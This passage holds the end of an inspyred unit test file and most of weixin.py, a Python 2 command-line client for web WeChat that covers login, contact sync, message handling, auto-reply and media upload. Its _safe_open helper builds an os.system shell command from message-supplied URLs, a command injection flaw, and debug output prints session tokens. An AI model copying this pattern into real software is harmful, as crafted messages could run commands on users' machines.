assert all([o == 1 for o in offspring[0]])
def test_nonuniform_mutation(self):
self.ec.num_generations = 0
offspring = inspyred.ec.variators.nonuniform_mutation(self.prng, list(self.candidates), {'_ec':self.ec, 'max_generations': 10})
assert(all([x >= 0 and x <= 1 for o in offspring for x in o]))
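# A minimal usage sketch (not part of the test suite) of how the operators
# exercised above are normally wired together; it assumes the public inspyred
# API and the test_generator/test_evaluator defined earlier in this file:
#
#   prng = random.Random()
#   ea = inspyred.ec.EvolutionaryComputation(prng)
#   ea.selector = inspyred.ec.selectors.tournament_selection
#   ea.variator = [inspyred.ec.variators.n_point_crossover,
#                  inspyred.ec.variators.gaussian_mutation]
#   ea.replacer = inspyred.ec.replacers.plus_replacement
#   ea.terminator = inspyred.ec.terminators.generation_termination
#   final_pop = ea.evolve(generator=test_generator, evaluator=test_evaluator,
#                         pop_size=10, bounder=inspyred.ec.Bounder(0, 1),
#                         max_generations=5, num_selected=10,
#                         tournament_size=2, num_crossover_points=1)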
if __name__ == '__main__':
unittest.main()
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
import httplib
from collections import defaultdict
from urlparse import urlparse
from lxml import html
#import pdb
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
        self.ContactList = []  # friends
        self.GroupList = []  # group chats
        self.GroupMemeberList = []  # group members
        self.PublicUsersList = []  # official/service accounts
        self.SpecialUsersList = []  # special accounts
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
        self.TimeOut = 20  # minimum sync interval, in seconds
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
if data == '':
return False
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
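    # Login handshake (driven from start() below): getUUID -> genQRCode ->
    # waitForLogin polls until the QR code is scanned (code 201) and confirmed
    # (code 200, which yields redirect_uri) -> login() extracts
    # skey/sid/uin/pass_ticket -> webwxinit.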
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
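        # synckey is the pipe-joined "Key_Val" sequence that synccheck expects,
        # e.g. "1_654585659|2_654585745|3_654585432" (illustrative values)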
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
        ContactList = self.MemberList[:]
        for i in xrange(len(ContactList) - 1, -1, -1):
            Contact = ContactList[i]
            if Contact['VerifyFlag'] & 8 != 0:  # official/service account
                ContactList.remove(Contact)
                self.PublicUsersList.append(Contact)
            elif Contact['UserName'] in SpecialUsers:  # special account
                ContactList.remove(Contact)
                self.SpecialUsersList.append(Contact)
            elif Contact['UserName'].find('@@') != -1:  # group chat
                ContactList.remove(Contact)
                self.GroupList.append(Contact)
            elif Contact['UserName'] == self.User['UserName']:  # ourselves
                ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
        # only ContactList/Count are consumed from the response
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
        # return the full ContactList; callers pick out the fields they need
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
#'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
'webpush.wechatapp.com',
'webpush.wx.qq.com',
'webpush.wx2.qq.com',
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
if data == '':
            return ['-1', '-1']  # string types, consistent with the parsed retcode/selector
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
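    # retcode/selector values as handled by listenMsgMode below:
    #   retcode '1100' = logged out on the phone, '1101' = logged in elsewhere,
    #   '0' = OK; selector '2' = new message, '6' = possible red packet,
    #   '7' = activity on the phone, '0' = nothing new.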
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
        if self.DEBUG:
            print json.dumps(dic, indent=4)
            logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
        # upload counter
        self.media_count = self.media_count + 1
        # file name
        file_name = image_name
        # MIME type, e.g. application/pdf, image/jpeg, image/png
        mime_type = mimetypes.guess_type(image_name, strict=False)[0]
        # WeChat distinguishes only two media categories: 'pic' is rendered
        # inline, while 'doc' is shown as a file attachment.
        media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
        # last-modified date (static placeholder)
        lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
        # file size in bytes
        file_size = os.path.getsize(file_name)
        # PassTicket
        pass_ticket = self.pass_ticket
        # webwx_data_ticket from the login cookies
        client_media_id = str(int(time.time() * 1000)) + \
            str(random.random())[:5].replace('.', '')
        # webwx_data_ticket
        webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
        if webwx_data_ticket == '':
            logging.error('[*] webwx_data_ticket cookie not found; upload aborted')
            return None
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
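    # The MediaId returned above is consumed by webwxsendmsgimg /
    # webwxsendmsgemotion below (see sendImg / sendEmotion for the full flow).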
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
    # Does not work at present: web WeChat does not support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
        if name == '未知群':
            # not found among the known groups; query the server by id
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
    def getUserRemarkName(self, id):
        name = '未知群' if id[:2] == '@@' else '陌生人'
        if id == self.User['UserName']:
            return self.User['NickName']  # ourselves
        if id[:2] == '@@':
            # group chat
            name = self.getGroupName(id)
        else:
            # special accounts
            for member in self.SpecialUsersList:
                if member['UserName'] == id:
                    name = member['RemarkName'] if member['RemarkName'] else member['NickName']
            # official/service accounts
            for member in self.PublicUsersList:
                if member['UserName'] == id:
                    name = member['RemarkName'] if member['RemarkName'] else member['NickName']
            # direct contacts
            for member in self.ContactList:
                if member['UserName'] == id:
                    name = member['RemarkName'] if member['RemarkName'] else member['NickName']
            # group members
            for member in self.GroupMemeberList:
                if member['UserName'] == id:
                    name = member['DisplayName'] if member['DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
            content = msg['raw_msg']['Content'].replace(
                '&lt;', '<').replace('&gt;', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
                # location message
                data = self._get(content)
                if data == '':
                    return
                data = data.decode('gbk').encode('utf-8')
                pos = self._searchContent('title', data, 'xml')
                temp = self._get(content)
                if temp == '':
                    return
                tree = html.fromstring(temp)
                url = tree.xpath('//html/body/div/img')[0].attrib['src']
                for item in urlparse(url).query.split('&'):
                    if item.split('=')[0] == 'center':
                        loc = item.split('=')[-1]
                content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s' % (
                    srcName, pos, url, loc)
            if msg['raw_msg']['ToUserName'] == 'filehelper':
                # file transfer helper
                dstName = '文件传输助手'
            if msg['raw_msg']['FromUserName'][:2] == '@@':
                # message received from a group
                if re.search(":<br/>", content, re.IGNORECASE):
                    [people, content] = content.split(':<br/>')
                    groupName = srcName
                    srcName = self.getUserRemarkName(people)
                    dstName = 'GROUP'
                else:
                    groupName = srcName
                    srcName = 'SYSTEM'
            elif msg['raw_msg']['ToUserName'][:2] == '@@':
                # message we sent to a group
                groupName = dstName
                dstName = 'GROUP'
            # red packet received
            if content == '收到红包,请在手机上查看':
                msg['message'] = content
            # caller supplied an explicit message body
            if 'message' in msg.keys():
                content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
            content = msg['Content'].replace('&lt;', '<').replace('&gt;', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
            elapsed = time.time() - self.lastCheckTs
            if elapsed <= self.TimeOut:
                # enforce the minimum sync interval before the next check
                time.sleep(self.TimeOut - elapsed)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import thread
            thread.start_new_thread(self.listenMsgMode, ())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
                [name, word] = text[2:].split(':', 1)
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
                [name, file] = text[3:].split(':', 1)
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
                [name, file_name] = text[3:].split(':', 1)
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
                [name, file_name] = text[3:].split(':', 1)
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
